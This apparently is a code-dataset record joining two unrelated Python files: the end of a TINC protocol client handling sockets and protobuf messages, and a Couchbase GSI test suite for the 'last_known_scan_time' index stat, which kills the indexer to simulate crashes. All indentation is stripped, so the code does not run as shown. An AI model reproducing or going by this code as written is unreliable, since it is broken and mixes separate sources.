slice_cache_dir = dp_details.cacheDirectory
# print(f"Register Datapool {dp_id}")
found = False
for dp in self.datapools:
if dp.id == dp_id:
if self.debug:
print(f"DataPool already registered: '{dp_id}'")
found = True
break
if not found:
ps = self.get_parameter_space(ps_id)
new_datapool = DataPool(dp_id, ps, slice_cache_dir, tinc_client=self)
self.datapools.append(new_datapool)
else:
print("Unexpected payload in Register Datapool")
def configure_datapool(self, details):
if details.Is(TincProtocol.ConfigureDataPool.DESCRIPTOR):
dp_details = TincProtocol.ConfigureDataPool()
details.Unpack(dp_details)
dp_id = dp_details.id
for dp in self.datapools:
if dp.id == dp_id:
if dp_details.configurationKey == TincProtocol.DataPoolConfigureType.SLICE_CACHE_DIR:
if dp_details.configurationValue.Is(TincProtocol.ParameterValue.DESCRIPTOR):
value = TincProtocol.ParameterValue()
dp_details.configurationValue.Unpack(value)
dp.slice_cache_dir = value.valueString
else:
print("Unexpected payload in Configure Datapool")
# Disk buffer messages ------------------
def register_disk_buffer(self, db):
# TODO is this enough checking, or should we check for ids as well?
if db in self.disk_buffers:
return db
self.disk_buffers.append(db)
self._register_disk_buffer_on_server(db)
def _register_disk_buffer_from_message(self, details):
if details.Is(TincProtocol.RegisterDiskBuffer.DESCRIPTOR):
db_details = TincProtocol.RegisterDiskBuffer()
details.Unpack(db_details)
disk_buffer_id= db_details.id
found = False
for db in self.disk_buffers:
if db.id == disk_buffer_id:
if self.debug:
if not db_details.type == db.type:
print(f"DiskBuffer registered: '{disk_buffer_id}' ERROR: type mismatch")
else:
print(f"DiskBuffer already registered: '{disk_buffer_id}'")
found = True
break
if not found:
new_db = None
distributed_path = db_details.path
if db_details.type == TincProtocol.JSON:
new_db = DiskBufferJson(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.NETCDF:
new_db = DiskBufferNetCDFData(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.IMAGE:
new_db = DiskBufferImage(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.BINARY:
new_db = DiskBufferBinary(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
elif db_details.type == TincProtocol.TEXT:
new_db = DiskBufferText(disk_buffer_id,
distributed_path.filename, distributed_path.relativePath, distributed_path.rootPath,
tinc_client= self)
if new_db is not None:
self.disk_buffers.append(new_db)
else:
self._log.append("Disk buffer type not recognized. Not creating DiskBuffer")
else:
print("Unexpected payload in Register DiskBuffer")
def _register_disk_buffer_on_server(self, db):
details = TincProtocol.RegisterDiskBuffer()
details.id = db.id
if type(db) == DiskBufferImage:
details.type = TincProtocol.IMAGE
elif type(db) == DiskBufferJson:
details.type = TincProtocol.JSON
elif type(db) == DiskBufferNetCDFData:
details.type = TincProtocol.NETCDF
elif type(db) == DiskBufferText:
details.type = TincProtocol.TEXT
elif type(db) == DiskBufferBinary:
details.type = TincProtocol.BINARY
else:
print("Unsupported Diskbuffer type. Not registered on server.")
return
details.path.filename = db.get_base_filename()
details.path.relativePath = db.get_relative_path()
details.path.rootPath = db.get_root_path()
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.MessageType.REGISTER
msg.objectType = TincProtocol.ObjectType.DISK_BUFFER
msg.details.Pack(details)
self._send_message(msg)
db.tinc_client = self
def configure_disk_buffer(self, details):
if self.debug:
print("Processing Configure disk buffer")
if details.Is(TincProtocol.ConfigureDiskBuffer.DESCRIPTOR):
db_details = TincProtocol.ConfigureDiskBuffer()
details.Unpack(db_details)
db_id = db_details.id
for db in self.disk_buffers:
if db.id == db_id:
if db_details.configurationKey == TincProtocol.DiskBufferConfigureType.CURRENT_FILE:
if db_details.configurationValue.Is(TincProtocol.ParameterValue.DESCRIPTOR):
value = TincProtocol.ParameterValue()
db_details.configurationValue.Unpack(value)
if value.valueString == '':
db._data = None
db._filename = ''
else:
db.load_data(value.valueString, False)
else:
print("Unexpected payload in Configure Datapool")
def send_disk_buffer_current_filename(self, disk_buffer, filename):
if not self.connected:
return
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.CONFIGURE
msg.objectType = TincProtocol.DISK_BUFFER
config = TincProtocol.ConfigureDiskBuffer()
config.id = disk_buffer.id
config.configurationKey = TincProtocol.DiskBufferConfigureType.CURRENT_FILE
value = TincProtocol.ParameterValue()
value.valueString = filename
config.configurationValue.Pack(value)
msg.details.Pack(config)
print("sent disk buffer filename: " + filename)
self._send_message(msg)
# ------------------------------------------------------
def _process_object_command_reply(self, message):
command_details = TincProtocol.Command()
self._log.append("Reply")
if message.details.Is(TincProtocol.Command.DESCRIPTOR):
message.details.Unpack(command_details)
message_id = command_details.message_id
# TODO we should verify the object id somehow
if self.debug:
print(f"**** Got reply for id {message_id} before lock")
try:
with self.pending_requests_lock:
if self.debug:
print(f"**** Got reply for id {message_id} after lock")
self._log.append(f"Got reply for id {message_id}")
command_data = self.pending_requests.pop(message_id)
with self.pending_lock:
self.pending_replies[message_id] = [command_details.details, command_data]
except KeyError:
print(f"Unexpected command reply: {message_id}")
else:
self._log.append("Unsupported payload in Command reply")
print("Unsupported payload in Command reply")
def _process_register_command(self, message):
if self.debug:
print(f"_process_register_command {message.objectType}")
if message.objectType == TincProtocol.ObjectType.PARAMETER:
self._register_parameter_from_message(message.details)
elif message.objectType == TincProtocol.ObjectType.PROCESSOR:
self.register_processor(message.details)
elif message.objectType == TincProtocol.ObjectType.DISK_BUFFER:
self._register_disk_buffer_from_message(message.details)
elif message.objectType == TincProtocol.ObjectType.DATA_POOL:
self._register_datapool_from_message(message.details)
elif message.objectType == TincProtocol.ObjectType.PARAMETER_SPACE:
self._register_parameter_space_from_message(message.details)
else:
print("Unexpected Register command")
def _process_request_command(self, message):
pass
def _process_remove_command(self, message):
pass
def _process_configure_command(self, message):
if self.debug:
print(f"_process_configure_command {message.objectType}")
if message.objectType == TincProtocol.PARAMETER:
self._configure_parameter_from_message(message.details)
elif message.objectType == TincProtocol.PROCESSOR:
self.configure_processor(message.details)
elif message.objectType == TincProtocol.DISK_BUFFER:
self.configure_disk_buffer(message.details)
elif message.objectType == TincProtocol.DATA_POOL:
self.configure_datapool(message.details)
elif message.objectType == TincProtocol.PARAMETER_SPACE:
self._configure_parameter_space_from_message(message.details)
else:
print("Unexpected Configure command")
def _process_command_command(self, message):
# TODO implement
pass
def _process_ping_command(self, message):
# TODO implement
pass
def _process_pong_command(self, message):
# TODO implement
pass
def _process_barrier_request(self, message):
command_details = TincProtocol.Command()
if message.details.Is(TincProtocol.Command.DESCRIPTOR):
message.details.Unpack(command_details)
with self._barrier_queues_lock:
print(f"_process_barrier_request added barrier {command_details.message_id}")
self._barrier_requests.append(command_details.message_id)
def _process_barrier_unlock(self, message):
command_details = TincProtocol.Command()
if message.details.Is(TincProtocol.Command.DESCRIPTOR):
message.details.Unpack(command_details)
with self._barrier_queues_lock:
print(f"_process_barrier_unlock added barrier unlock {command_details.message_id}")
self._barrier_unlocks.append(command_details.message_id)
def _process_status(self, message):
details = message.details
if details.Is(TincProtocol.StatusMessage.DESCRIPTOR):
status_details = TincProtocol.StatusMessage()
details.Unpack(status_details)
self._server_status = status_details.status
def _process_working_path(self, message):
details = message.details
if details.Is(TincProtocol.TincPath.DESCRIPTOR):
path_details = TincProtocol.TincPath()
details.Unpack(path_details)
self._working_path = path_details.path
print("Set working path to " + self._working_path)
# Send request commands
def request_parameters(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.PARAMETER
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_processors(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.PROCESSOR
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_disk_buffers(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.DISK_BUFFER
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_data_pools(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.DATA_POOL
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def request_parameter_spaces(self):
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.REQUEST
tp.objectType = TincProtocol.PARAMETER_SPACE
obj_id = TincProtocol.ObjectId()
obj_id.id = ""
tp.details.Pack(obj_id)
self._send_message(tp)
def _get_command_id(self):
self.request_count_lock.acquire()
command_id = self.pending_requests_count
self.pending_requests_count += 1
if self.pending_requests_count == 4294967295:
self.pending_requests_count = 0
self.request_count_lock.release()
return command_id
def _wait_for_reply(self, request_number, timeout_sec= 30):
start_time = time.time()
self.pending_lock.acquire()
while not request_number in self.pending_replies:
self.pending_lock.release()
time.sleep(0.05)
if (time.time() - start_time) > timeout_sec:
raise TincTimeout("Timeout.")
self.pending_lock.acquire()
reply = self.pending_replies.pop(request_number)
self.pending_lock.release()
return reply
def _command_parameter_choice_elements(self, parameter, timeout=30):
parameter_addr = parameter.get_osc_address()
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.PARAMETER
command = TincProtocol.Command()
command.id.id = parameter_addr
request_number = self._get_command_id()
command.message_id = request_number
slice_details = TincProtocol.ParameterRequestChoiceElements()
command.details.Pack(slice_details)
msg.details.Pack(command)
# TODO check possible race condiiton in pending_requests count. Does the GIL make it safe?
self.pending_requests[request_number] = [parameter]
self._send_message(msg)
if self.debug:
print(f"Sent command: {request_number}")
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.ParameterRequestChoiceElementsReply.DESCRIPTOR):
slice_reply = TincProtocol.ParameterRequestChoiceElementsReply()
command_details.Unpack(slice_reply)
print(slice_reply.elements)
user_data[0].set_elements(slice_reply.elements)
def _command_parameter_space_get_current_relative_path(self, ps, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.PARAMETER_SPACE
command = TincProtocol.Command()
command.id.id = ps.id
request_number = self._get_command_id()
command.message_id = request_number
slice_details = TincProtocol.ParameterSpaceRequestCurrentPath()
command.details.Pack(slice_details)
msg.details.Pack(command)
# TODO check possible race conditon in pending_requests count. Does the GIL make it safe?
self.pending_requests[request_number] = [ps]
self._send_message(msg)
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.ParameterSpaceRequestCurrentPathReply.DESCRIPTOR):
slice_reply = TincProtocol.ParameterSpaceRequestCurrentPathReply()
command_details.Unpack(slice_reply)
return slice_reply.path
def _command_parameter_space_get_root_path(self, ps, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.PARAMETER_SPACE
command = TincProtocol.Command()
command.id.id = ps.id
request_number = self._get_command_id()
command.message_id = request_number
slice_details = TincProtocol.ParameterSpaceRequestRootPath()
command.details.Pack(slice_details)
msg.details.Pack(command)
# TODO check possible race condiiton in pending_requests count. Does the GIL make it safe?
self.pending_requests[request_number] = [ps]
self._send_message(msg)
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.ParameterSpaceRequestRootPathReply.DESCRIPTOR):
slice_reply = TincProtocol.ParameterSpaceRequestRootPathReply()
command_details.Unpack(slice_reply)
return slice_reply.path
def _command_datapool_slice_file(self, datapool_id, field, sliceDimensions, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.DATA_POOL
command = TincProtocol.Command()
command.id.id = datapool_id
command.message_id = self._get_command_id()
request_number = command.message_id
slice_details = TincProtocol.DataPoolCommandSlice()
slice_details.field = field
if type(sliceDimensions) == str:
slice_details.dimension[:] = [sliceDimensions]
elif type(sliceDimensions) == list and len(sliceDimensions) > 0:
for dim in sliceDimensions:
slice_details.dimension.append(dim)
command.details.Pack(slice_details)
msg.details.Pack(command)
if self.debug:
print(f"command datapools send command {command.message_id}")
# TODO check possible race condiiton in pending_requests count
self.pending_requests[command.message_id] = [datapool_id]
self._send_message(msg)
# print(f"Sent command: {request_number}")
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.DataPoolCommandSliceReply.DESCRIPTOR):
slice_reply = TincProtocol.DataPoolCommandSliceReply()
command_details.Unpack(slice_reply)
return slice_reply.filename
else:
return None
def _command_datapool_get_files(self, datapool_id, timeout=30):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.COMMAND
msg.objectType = TincProtocol.DATA_POOL
command = TincProtocol.Command()
command.id.id = datapool_id
command.message_id = self._get_command_id()
request_number = command.message_id
command_details = TincProtocol.DataPoolCommandCurrentFiles()
command.details.Pack(command_details)
msg.details.Pack(command)
# TODO check possible race condiiton in pending_requests count
if self.debug:
print(f"command datapools send command {command.message_id}")
self.pending_requests[command.message_id] = [datapool_id]
self._send_message(msg)
if self.debug:
print(f"Sent datapool get files command: {request_number}")
try:
command_details, user_data = self._wait_for_reply(request_number, timeout)
except TincTimeout as tm:
self.pending_requests.pop(request_number)
raise tm
if command_details.Is(TincProtocol.DataPoolCommandCurrentFilesReply.DESCRIPTOR):
command_reply = TincProtocol.DataPoolCommandCurrentFilesReply()
command_details.Unpack(command_reply)
return command_reply.filenames
else:
return None
def synchronize(self):
self.send_metadata()
self.request_parameters()
self.request_parameter_spaces()
self.request_processors()
self.request_disk_buffers()
self.request_data_pools()
def send_goodbye(self):
if not self.connected:
return
tp = TincProtocol.TincMessage()
tp.messageType = TincProtocol.GOODBYE
tp.objectType = TincProtocol.GLOBAL
self._send_message(tp)
def _process_goodbye(self, client_address, address: str, *args: List[Any]):
# TODO we need to define behavior. Should client stay alive and then
# restore the state on the server if it comes up again?
print("Got GOODBYE message, stopping TincClient")
self.stop()
def _send_message(self, msg):
size = msg.ByteSize()
ser_size = struct.pack('N', size)
if not self.socket:
if self.debug:
print("No server connected. Message not sent")
return
try:
num_bytes = self.socket.send(ser_size + msg.SerializeToString())
if self.debug:
print(f'message sent {num_bytes} bytes')
except BrokenPipeError as e:
# Disconnect
self.running = False
self.connected = False
self.x.join()
self.socket.close()
self.socket = None
print("Broken pipe to server. Client is disconnected")
if self.debug:
print(e.strerror)
# Server ---------------
def _server_thread_function(self, ip: str, port: int):
# print("Starting on port " + str(port))
al_message = b''
pc_message = TincProtocol.TincMessage()
failed_attempts = 0
while self.running:
if not self.connected:
self.socket = None
try:
# Attempt a connection
if failed_attempts == 1:
if self.debug:
print(f"Attempt connection. {ip}:{port}")
failed_attempts += 1
if failed_attempts == 100:
print("Connection failed.")
self.stop()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(True)
s.connect((ip, port))
except:
# Connection was not possible, try later
time.sleep(1.0)
continue
s.settimeout(10.0)
if self.debug:
print("Connected, sending handshake.")
hs_message = bytearray()
hs_message.append(commands['HANDSHAKE'])
hs_message += struct.pack("L", tinc_client_version)
hs_message += struct.pack("L", tinc_client_revision)
s.send(hs_message)
hs_message = Message(s.recv(5))
command = hs_message.get_byte()
if command == commands['HANDSHAKE_ACK']:
self.server_version = 0
self.server_revision = 0
if len(hs_message.remaining_bytes()) > 3:
self.server_version = hs_message.get_uint16()
if len(hs_message.remaining_bytes()) > 1:
self.server_revision = hs_message.get_uint16()
if self.server_version != tinc_client_version:
raise ValueError("Tinc protocol version mismatch")
if self.server_revision != tinc_client_revision:
print("WARNING: protocol revision mismatch")
self.connected = True
self.socket = s
failed_attempts = 0
self.synchronize()
print(f"Connected to {ip}:{port}. Server version {self.server_version} revision {self.server_revision}")
else:
print("Expected HANDSHAKE_ACK. CLosing connection. Got {message[0]}")
else:
new_message = b''
try:
new_message = self.socket.recv(1024)
except ConnectionResetError:
print("Connection closed.")
self.socket = None
self.connected = False;
except ConnectionAbortedError:
print("Connection closed.")
self.connected = False;
except socket.timeout:
continue
al_message = al_message + new_message
while len(al_message) > 8:
message_size = struct.unpack("N", al_message[:8])[0]
if self.debug:
print(f'received raw {message_size}')
if len(al_message) < message_size + 8:
break
num_bytes = pc_message.ParseFromString(al_message[8:8+message_size])
#print(f'unpacked {num_bytes}')
if num_bytes > 0:
if self.debug:
print(f"Processing message bytes:{num_bytes}")
if pc_message.messageType == TincProtocol.REQUEST:
self._process_request_command(pc_message)
elif pc_message.messageType == TincProtocol.REMOVE:
self._process_remove_command(pc_message)
elif pc_message.messageType == TincProtocol.REGISTER:
self._process_register_command(pc_message)
elif pc_message.messageType == TincProtocol.CONFIGURE:
self._process_configure_command(pc_message)
elif pc_message.messageType == TincProtocol.COMMAND:
self._process_command_command(pc_message)
elif pc_message.messageType == TincProtocol.COMMAND_REPLY:
self._process_object_command_reply(pc_message)
elif pc_message.messageType == TincProtocol.PING:
self._process_ping_command(pc_message)
elif pc_message.messageType == TincProtocol.PONG:
self._process_pong_command(pc_message)
elif pc_message.messageType == TincProtocol.GOODBYE:
self._process_goodbye(pc_message)
elif pc_message.messageType == TincProtocol.BARRIER_REQUEST:
self._process_barrier_request(pc_message)
elif pc_message.messageType == TincProtocol.BARRIER_UNLOCK:
self._process_barrier_unlock(pc_message)
elif pc_message.messageType == TincProtocol.STATUS:
self._process_status(pc_message)
elif pc_message.messageType == TincProtocol.TINC_WORKING_PATH:
self._process_working_path(pc_message)
else:
print("Unknown message")
al_message = al_message[message_size + 8:]
if self.debug:
print(f"Processed Byte_size {message_size}:{pc_message.ByteSize()}" )
else:
break
print("Closed TINC client")
def send_metadata(self):
msg = TincProtocol.TincMessage()
msg.messageType = TincProtocol.TINC_CLIENT_METADATA
msg.objectType = TincProtocol.GLOBAL
metadata = TincProtocol.ClientMetaData()
metadata.clientHost = socket.gethostname()
msg.details.Pack(metadata)
self._send_message(msg)
def print(self):
# print("Print")
if self.socket:
print("TINC Server")
if self.connected:
print("CONNECTED")
for param in self.parameters:
param.print()
for ps in self.parameter_spaces:
ps.print()
for db in self.disk_buffers:
db.print()
for p in self.processors:
p.print()
for dp in self.datapools:
dp.print()
elif self.running:
print("Attempting to connect to app. App is not reponding.")
else:
print("NOT CONNECTED")
else:
print("NOT CONNECTED")
|
gsi_index_partitioning.py
|
import copy
import json
import threading
import time
from .base_gsi import BaseSecondaryIndexingTests
from membase.api.rest_client import RestConnection, RestHelper
import random
from lib import testconstants
from lib.couchbase_helper.tuq_generators import TuqGenerators
from lib.memcached.helper.data_helper import MemcachedClientHelper
from lib.remote.remote_util import RemoteMachineShellConnection
from threading import Thread
from pytests.query_tests_helper import QueryHelperTests
from couchbase_helper.documentgenerator import JsonDocGenerator
from couchbase_helper.cluster import Cluster
from .gsi_replica_indexes import GSIReplicaIndexesTests
from lib.membase.helper.cluster_helper import ClusterOperationHelper
class GSIIndexPartitioningTests(GSIReplicaIndexesTests):
def setUp(self):
super(GSIIndexPartitioningTests, self).setUp()
self.num_items = self.input.param("items", 5000)
self.log.info("No. of items: {0}".format(str(self.num_items)))
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
self.rest = RestConnection(self.index_servers[0])
self.node_list = []
for server in self.index_servers:
self.node_list.append(server.ip + ":" + server.port)
self.num_queries = self.input.param("num_queries", 100)
self.num_index_partitions = self.input.param("num_index_partitions", 8)
self.recover_failed_node = self.input.param("recover_failed_node",
False)
self.op_type = self.input.param("op_type", "create")
self.node_operation = self.input.param("node_op", "reboot")
self.implicit_use_index = self.input.param("implicit_use_index", False)
self.use_replica_index = self.input.param("use_replica_index", False)
self.failover_index = self.input.param("failover_index", False)
self.index_partitioned = self.input.param('index_partitioned', False)
def tearDown(self):
super(GSIIndexPartitioningTests, self).tearDown()
'''Test that checks if hte last_known_scan_time stat is being set properly
- Test explicitly calling a specific index to see if it is updated
- Test implicitly calling a specific index to see if it is updated
- Test if the stat persists after an indexer crash'''
def test_index_last_query_stat(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
doc = {"indexer.statsPersistenceInterval": 60}
rest.set_index_settings_internal(doc)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
if self.index_partitioned:
create_index_query = "CREATE INDEX idx on default(age) partition by hash(name) USING GSI"
else:
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
# Implicitly or Explicitly use the index in question
if self.implicit_use_index:
use_index_query = 'select * from default where age > 50'
else:
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
used_index = 'idx'
for index_node in indexer_nodes:
rest = RestConnection(index_node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if index == used_index:
self.log.info(int(str(indexes['default'][index]['last_known_scan_time'])[:10]))
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
if self.failover_index:
self.sleep(60)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
break
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
if self.failover_index:
for index_node in indexer_nodes:
rest = RestConnection(index_node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if index == used_index:
self.log.info(int(str(indexes['default'][index]['last_known_scan_time'])[:10]))
self.assertTrue(
current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 180,
'The timestamp is more than a minute off')
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
'''Same as the test above for partitioned indexes'''
def test_index_last_query_stat_partitioned(self):
create_index_query = "CREATE INDEX idx on default(age) partition by hash(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
# Implicitly or Explicitly use the index in question
if self.implicit_use_index:
use_index_query = 'select * from default where age > 50'
else:
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
used_index = 'idx'
for index_node in indexer_nodes:
rest = RestConnection(index_node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if index == used_index:
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
'''Test that equivalent indexes/replicas are being updated properly, if you specifically use an index any of
its equivalent indexes can be used, however both should not be used'''
def test_index_last_query_stat_equivalent_indexes(self):
if not self.use_replica_index:
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
create_index_query3 = "CREATE INDEX idx3 ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
else:
create_index_query = "CREATE INDEX idx ON default(age) USING GSI WITH {'num_replica': 1};"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
use_index_query = 'select * from default USE INDEX (idx using GSI) where age > 50'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
check_idx = False
check_idx3 = False
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
if self.use_replica_index:
if index == 'idx':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx = True
elif index == 'idx (replica 1)':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx3 = True
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
if index == 'idx':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx = True
elif index == 'idx3':
if current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60:
check_idx3 = True
else:
self.assertTrue(indexes['default'][index]['last_known_scan_time'] == 0)
else:
continue
# One or the other should have been used, not both
self.assertTrue(check_idx or check_idx3)
self.assertFalse(check_idx and check_idx3)
'''Run a query that uses two different indexes at once and make sure both are properly updated'''
def test_index_last_query_multiple_indexes(self):
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertTrue(indexer_nodes, "There are no indexer nodes in the cluster!")
# Ensure last_known_scan_time starts at default value
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertEqual(indexes['default'][index]['last_known_scan_time'], 0)
else:
continue
# Construct a query that uses both created indexes and ensure they both have a last used timestamp
use_index_query = 'select * from default where age > 50 and name = "Caryssa"'
self.n1ql_helper.run_cbq_query(query=use_index_query, server= self.n1ql_node)
current_time = int(time.time())
self.log.info(current_time)
# All indexes that were created should be used
for node in indexer_nodes:
rest = RestConnection(node)
indexes = rest.get_index_stats()
self.log.info(indexes)
self.assertTrue(indexes, "There are no indexes on the node!")
if 'default' in indexes:
for index in indexes['default']:
self.assertTrue(current_time - int(str(indexes['default'][index]['last_known_scan_time'])[:10]) < 60, 'The timestamp is more than a minute off')
else:
continue
'''Make sure that two indexes with the same name on two different buckets does not cause an incorrect update of stat'''
def test_index_last_query_stat_multiple_buckets(self):
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
create_index_query2 = "CREATE INDEX idx ON standard_bucket0(age) USING GSI"
create_index_query3 = "CREATE INDEX idx2 ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
